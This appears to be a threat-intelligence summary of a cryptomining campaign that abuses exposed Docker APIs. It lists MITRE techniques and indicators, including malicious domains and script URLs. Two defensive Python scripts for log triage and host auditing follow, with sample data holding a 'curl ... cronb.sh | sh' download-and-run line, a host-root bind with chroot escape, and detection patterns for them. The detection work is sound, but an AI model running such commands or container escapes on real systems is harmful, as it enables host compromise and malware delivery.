Trend Micro’s honeypots detected cryptocurrency mining activity targeting cloud and container environments. The actors abuse exposed Docker APIs and propagate in a worm-like fashion that resembles TeamTNT’s arsenal, though WatchDog may be mimicking TeamTNT or may itself be behind the campaign. The operation deploys an XMRig miner inside Docker containers, uses ZGrab and other scanners for reconnaissance, and relies on cron jobs, rootkits, and SSH key deployment to persist and spread; attribution remains uncertain between TeamTNT and WatchDog.
Key points
- Malicious cryptocurrency mining samples were observed targeting cloud and container environments.
- Attack patterns resemble TeamTNT, but WatchDog may be mimicking TeamTNT’s arsenal or behind the campaign.
- Exposed Docker APIs were probed from IPs around the world, with initial requests to retrieve Docker version information.
- ZGrab, a banner-grabbing tool, was used in the reconnaissance of Docker API endpoints.
- Payloads include cron-based persistence (cronb.sh) that downloads and runs the XMRig miner and related components.
- The attacker uses rootkits, SSH authorized_keys, and various cleanup/hiding techniques to evade detection and maintain access.
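The probe-then-deploy sequence summarised in the key points (a Docker API version request, then a container create that binds the host filesystem and chroots into it) can be triaged from Docker daemon access logs. The following script is an added example for this page, not code from Trend Micro or from the campaign; the log format (one JSON object per line with `src`, `method`, `path`, `body`, as a reverse proxy in front of the Docker socket might emit), the sample records, the `placeholder.invalid` host and the documentation-range IP addresses are all constructed for the example.

```python
"""Triage Docker Engine API access logs for the probe-then-deploy pattern:
GET /version reconnaissance followed by POST /containers/create that binds
the host root filesystem into the container (the '/mnt' + chroot escape).

Constructed example; the log lines below are not real traffic. Assumed
format: one JSON object per line with keys src, method, path, body.
"""
import json
import re
from collections import defaultdict

# Engine API paths may carry a version prefix, e.g. /v1.41/version.
VERSION_RE = re.compile(r"^(?:/v\d+\.\d+)?/version$")
CREATE_RE = re.compile(r"^(?:/v\d+\.\d+)?/containers/create$")

# Constructed sample log (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = "\n".join([
    '{"src": "203.0.113.10", "method": "GET", "path": "/v1.41/version", "body": ""}',
    '{"src": "203.0.113.10", "method": "POST", "path": "/v1.41/containers/create",'
    ' "body": {"Image": "alpine", "Cmd": ["chroot", "/mnt", "sh", "-c",'
    ' "curl -s http://placeholder.invalid/cronb.sh | sh"],'
    ' "HostConfig": {"Binds": ["/:/mnt"]}}}',
    '{"src": "203.0.113.20", "method": "GET", "path": "/version", "body": ""}',
    '{"src": "198.51.100.5", "method": "POST", "path": "/containers/create",'
    ' "body": {"Image": "nginx:1.25", "Cmd": [],'
    ' "HostConfig": {"Binds": ["web-data:/usr/share/nginx/html"]}}}',
])

# Highest-severity stage wins; dict order is the lookup order.
SEVERITY = {
    "host_root_bind": "critical",   # host "/" mounted into the container
    "chroot_cmd": "high",           # command chroots, typically into that mount
    "container_create": "medium",   # any create from an unexpected source
    "version_probe": "low",         # reconnaissance only
}


def parse_log(text):
    """Parse JSON-lines log text into a list of request records."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def mounts_host_root(body):
    """True if the create request binds the host root filesystem into the container."""
    host_cfg = (body or {}).get("HostConfig", {}) or {}
    binds = host_cfg.get("Binds", []) or []
    mounts = host_cfg.get("Mounts", []) or []
    return (any(b.split(":")[0] == "/" for b in binds)
            or any(m.get("Source") == "/" for m in mounts))


def uses_chroot(body):
    """True if the container command invokes chroot anywhere in its argv."""
    return any("chroot" in part for part in ((body or {}).get("Cmd") or []))


def classify_sources(records):
    """Map each source IP to the sorted set of attack stages observed from it."""
    stages = defaultdict(set)
    for rec in records:
        if rec["method"] == "GET" and VERSION_RE.match(rec["path"]):
            stages[rec["src"]].add("version_probe")
        elif rec["method"] == "POST" and CREATE_RE.match(rec["path"]):
            stages[rec["src"]].add("container_create")
            if mounts_host_root(rec["body"]):
                stages[rec["src"]].add("host_root_bind")
            if uses_chroot(rec["body"]):
                stages[rec["src"]].add("chroot_cmd")
    return {src: sorted(s) for src, s in stages.items()}


def severity_for(stages):
    """Return the severity label of the most serious stage present."""
    for stage, label in SEVERITY.items():
        if stage in stages:
            return label
    return "none"


def triage(log_text):
    """Full pipeline: parse, classify per source, attach a severity."""
    report = {}
    for src, stages in classify_sources(parse_log(log_text)).items():
        report[src] = {"severity": severity_for(stages), "stages": stages}
    return report


if __name__ == "__main__":
    for src, info in sorted(triage(SAMPLE_LOG).items()):
        print(f"{src:15} {info['severity']:8} {', '.join(info['stages'])}")
```

On a real deployment the same logic would run over the proxy or audit log that fronts `/var/run/docker.sock`; the point of the severity ladder is that a bare `/version` probe is noise worth counting, while a create request whose `Binds` starts with `/:` deserves an immediate page.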
MITRE Techniques
- [T1133] External Remote Services – Docker API version info requests used to identify reachable Docker endpoints. – “…Docker API request to get the docker version info using ‘version’ method…”
- [T1610] Deploy Container – Docker API create container to launch a new Alpine-based container for the miner. – “…Docker API request to create a container using ‘create’ method…”
- [T1611] Escape to Host – chroot to mount the filesystem at /mnt, enabling broader access. – “…‘chroot’ to mount file system at ‘/mnt’ directory”
- [T1105] Ingress Tool Transfer – C2/downloads via HTTP (curl) to fetch cronb.sh. – “…curl command is used to download the ‘cronb.sh’…”
- [T1071.001] Application Layer Protocol: Web Protocols – Web-based transfer/downloads to fetch scripts and payloads. – “Web protocols are used for download of scripts via HTTP(S) requests”
- [T1204.003] User Execution: Malicious File – Miner delivered/executed to harvest cryptocurrency. – “…To harvest crypto currency ‘xmrig’ coin miner is used”
- [T1046] Network Service Discovery – Masscan used to discover services within the network. – “…masscan scanning tool is used”
- [T1053.003] Scheduled Task/Job: Cron – Cron entries created to fetch and execute payloads. – “…the cron entry in crontab and /etc/cron.d to download the file cronb.sh”
- [T1053.007] Scheduled Task/Job: Container Orchestration Job – Container deployment via Docker orchestration steps. – “…deploy an alpine-based container with instructions to download and execute the malicious shell script”
- [T1098.004] SSH Authorized Keys – Attackers add SSH public key to authorized_keys to enable remote access. – “The SSH public key we found: ssh-rsa AAAA…”
- [T1547.006] Boot or Logon Autostart: Kernel Modules and Extensions – Rootkit installed as kernel module via insmod. – “…installs the rootkit as a kernel module with the help of the insmod command”
- [T1543.002] Create or Modify Systemd Service – Creates cmake.service under /etc/systemd/system. – “as a service in the system under path /etc/systemd/system/cmake.service”
- [T1574.006] Hijack Execution Flow: Dynamic Linker Hijacking – Updates /etc/ld.so.preload to hide processes. – “updates the /etc/ld.so.preload file”
- [T1222.002] File and Directory Permissions Modification – Makes cron files immutable via permission changes. – “make the files immutable again by changing the attributes of the cron files”
- [T1562.001] Impair Defenses: Disable or Modify Tools – Disables SELinux, watchdog, AppArmor, and firewall service. – “Disables various OS’ security and logging features”
- [T1562.003] Impair Defenses: Impair Command History Logging – Clears bash history to hinder audit trails. – “clears the bash history”
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – Clears iptables rules and disables firewall services. – “Clears the firewall rules from iptables”
- [T1014] Rootkit – Kernel module rootkit installation for stealth. – “Rootkit installation”
- [T1018] Remote System Discovery – Lateral movement via SSH to remote servers. – “SSH and deploys the b.sh file in the remote SSH server”
- [T1132.001] Data Encoding: Standard Encoding – Base64-encoded strings used in the payloads and banners. – “Base64-encoded string”
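Several of the host-side techniques above leave artefacts a defender can audit directly: an entry in /etc/ld.so.preload (T1574.006), a cron job that pipes a downloaded script into a shell (T1053.003), the immutable attribute on that cron file (T1222.002), a systemd unit started from a scratch directory (T1543.002) and an unprovisioned key in authorized_keys (T1098.004). The audit below is an added example written for this page, not Trend Micro’s tooling or the campaign’s code. It runs over an in-memory snapshot so it works offline; the snapshot contents, the `placeholder.invalid` host, the key strings and the `KNOWN_GOOD_KEYS` allowlist are constructed for the example, and the `cmake.service` name is the one the report lists.

```python
"""Audit a host snapshot for the persistence / defence-evasion artefacts
listed in the technique table. Constructed example: SNAPSHOT maps a path to
(file content, set of lsattr flags); a real collector would read the same
paths and the output of `lsattr`. Technique IDs follow the table above.
"""
import re
import shlex

# Constructed snapshot, not real data.
SNAPSHOT = {
    "/etc/ld.so.preload": ("/usr/local/lib/libsystem.so\n", set()),
    "/etc/cron.d/zzh": (
        "*/30 * * * * root curl -fsSL http://placeholder.invalid/cronb.sh | sh\n", {"i"}),
    "/etc/cron.d/sysstat": ("5-55/10 * * * * root /usr/lib/sysstat/sa1 1 1\n", set()),
    "/etc/systemd/system/cmake.service": (
        "[Unit]\nDescription=cmake\n[Service]\nExecStart=/tmp/.x/cmake\n"
        "[Install]\nWantedBy=multi-user.target\n", set()),
    "/root/.ssh/authorized_keys": (
        "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKNOWNGOODKEY admin@bastion\n"
        "ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDERUNKNOWNKEY\n", set()),
}

# Keys the organisation provisioned (constructed); anything else is a finding.
KNOWN_GOOD_KEYS = {"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKNOWNGOODKEY"}

# "curl/wget ... | sh" inside a cron line: download-and-execute.
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Directories from which a legitimate service should not be launched.
UNTRUSTED_EXEC_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def check_ld_preload(snap):
    """Any library in /etc/ld.so.preload is reported; the file is normally absent or empty."""
    content, _ = snap.get("/etc/ld.so.preload", ("", set()))
    return [("T1574.006", "/etc/ld.so.preload", f"preloads {line.strip()}")
            for line in content.splitlines() if line.strip()]


def check_cron(snap):
    """Flag cron entries that fetch-and-run, and cron files made immutable."""
    findings = []
    for path, (content, attrs) in snap.items():
        if not path.startswith(("/etc/cron", "/var/spool/cron")):
            continue
        for line in content.splitlines():
            if DOWNLOAD_AND_RUN.search(line):
                findings.append(("T1053.003", path, f"downloads and executes: {line.strip()}"))
        if "i" in attrs:
            findings.append(("T1222.002", path, "immutable attribute set on cron file"))
    return findings


def check_systemd(snap):
    """Flag units whose ExecStart binary lives in a scratch or home directory."""
    findings = []
    for path, (content, _) in snap.items():
        if not path.startswith("/etc/systemd/system/"):
            continue
        for line in content.splitlines():
            if line.startswith("ExecStart="):
                argv = shlex.split(line[len("ExecStart="):])
                exe = argv[0].lstrip("-+!@") if argv else ""   # strip systemd prefixes
                if exe.startswith(UNTRUSTED_EXEC_DIRS):
                    findings.append(("T1543.002", path, f"ExecStart from untrusted dir: {exe}"))
    return findings


def check_authorized_keys(snap):
    """Report keys not in the allowlist; options before the key type are skipped."""
    findings = []
    for path, (content, _) in snap.items():
        if not path.endswith("/.ssh/authorized_keys"):
            continue
        for line in content.splitlines():
            parts = line.split()
            if not parts or parts[0].startswith("#"):
                continue
            idx = next((i for i, p in enumerate(parts) if p.startswith(KEY_TYPE_PREFIXES)), None)
            if idx is None or idx + 1 >= len(parts):
                continue
            key = f"{parts[idx]} {parts[idx + 1]}"
            if key not in KNOWN_GOOD_KEYS:
                findings.append(("T1098.004", path, f"unknown key ending ...{parts[idx + 1][-12:]}"))
    return findings


def audit(snap):
    """Run every check and return (technique, path, detail) tuples."""
    return (check_ld_preload(snap) + check_cron(snap)
            + check_systemd(snap) + check_authorized_keys(snap))


if __name__ == "__main__":
    for technique, path, detail in audit(SNAPSHOT):
        print(f"{technique:10} {path:40} {detail}")
```

The checks are deliberately behavioural rather than name-based (a pipe into `sh` from a cron line, an `ExecStart` under /tmp, a key outside the provisioned set), so they keep working when the next campaign renames `cronb.sh` or `cmake.service`.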
Indicators of Compromise
- [IP Address] – Exposed Docker API connections from many IPs; examples: 115.238.146.136, 150.158.33.66, and 10 other addresses
- [Domain] – kiss.a-dog.top and oracle.zzhreceive.top used in fetch and C2-related activity
- [Domain] – kiss.a-dog.top/t.sh and related domains/files observed in the drop/install chain
- [File] – xm.tar (XMRIG miner package) and config.json in /usr/share; 1.0.4.tar.gz in the rootkit workflow
- [URL] – http://kiss.a-dog.top/b2f628/b.sh and related script download URLs
- [SSH Key] – SSH public key found in authorized_keys for persistence
Read more: https://www.trendmicro.com/en_us/research/22/j/teamtnt-returns-or-does-it.html